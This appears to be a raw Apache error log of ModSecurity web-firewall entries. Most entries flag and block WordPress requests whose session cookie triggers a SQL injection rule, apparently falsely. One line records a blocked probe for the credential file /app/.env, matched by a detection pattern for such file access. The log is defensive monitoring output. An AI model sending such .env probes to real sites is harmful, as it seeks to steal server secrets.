[Mon May 11 22:20:05.228541 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI59aFW67LJTsgN3jQKHQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:05.228833 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI59aFW67LJTsgN3jQKHQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:05.891905 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI59aFW67LJTsgN3jQKHQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:06.340589 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI59qFW67LJTsgN3jQKIAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:06.340880 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI59qFW67LJTsgN3jQKIAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:07.265442 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI59qFW67LJTsgN3jQKIAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:07.527317 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI596FW67LJTsgN3jQKIgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:07.527693 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI596FW67LJTsgN3jQKIgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:08.038131 2026] [security2:error] [pid 1590352:tid 1590407] [client 176.65.139.235:38806] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sitebuilder.totalcloud.fr"] [uri "/app/.env"] [unique_id "agI5-K1q0G_aXAqWauT5GAAAAI8"]
[Mon May 11 22:20:08.038386 2026] [security2:error] [pid 1590352:tid 1590407] [client 176.65.139.235:38806] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sitebuilder.totalcloud.fr"] [uri "/app/.env"] [unique_id "agI5-K1q0G_aXAqWauT5GAAAAI8"]
[Mon May 11 22:20:08.038924 2026] [core:error] [pid 1590352:tid 1590407] [client 176.65.139.235:38806] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:20:08.039774 2026] [security2:error] [pid 1590352:tid 1590407] [client 176.65.139.235:38806] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agI5-K1q0G_aXAqWauT5GAAAAI8"]
[Mon May 11 22:20:08.127411 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI596FW67LJTsgN3jQKIgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:08.954755 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI5-KFW67LJTsgN3jQKJAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:08.955175 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI5-KFW67LJTsgN3jQKJAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:09.315426 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI5-KFW67LJTsgN3jQKJAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:09.947082 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI5-aFW67LJTsgN3jQKJgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:09.947511 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI5-aFW67LJTsgN3jQKJgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:10.608399 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI5-aFW67LJTsgN3jQKJgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:11.327193 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI5-6FW67LJTsgN3jQKJwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:11.327497 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI5-6FW67LJTsgN3jQKJwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:11.948039 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI5-6FW67LJTsgN3jQKJwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:12.334670 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI5_KFW67LJTsgN3jQKKQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:12.335095 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI5_KFW67LJTsgN3jQKKQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:12.713875 2026] [authz_core:error] [pid 1601130:tid 1601166] [client 47.128.125.46:59446] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/sodium_compat/src/error_log
[Mon May 11 22:20:12.957851 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI5_KFW67LJTsgN3jQKKQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:13.350898 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI5_aFW67LJTsgN3jQKKwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:13.351183 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI5_aFW67LJTsgN3jQKKwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:13.957917 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI5_aFW67LJTsgN3jQKKwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:14.154234 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI5_qFW67LJTsgN3jQKLAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:14.154519 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI5_qFW67LJTsgN3jQKLAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:14.718486 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI5_qFW67LJTsgN3jQKLAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:14.937766 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI5_qFW67LJTsgN3jQKLQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:14.938221 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI5_qFW67LJTsgN3jQKLQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:15.315377 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI5_qFW67LJTsgN3jQKLQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:15.937556 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI5_6FW67LJTsgN3jQKLwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:15.937830 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI5_6FW67LJTsgN3jQKLwAAAAg"], referer: https://rentparadise.fr/wp-login.php
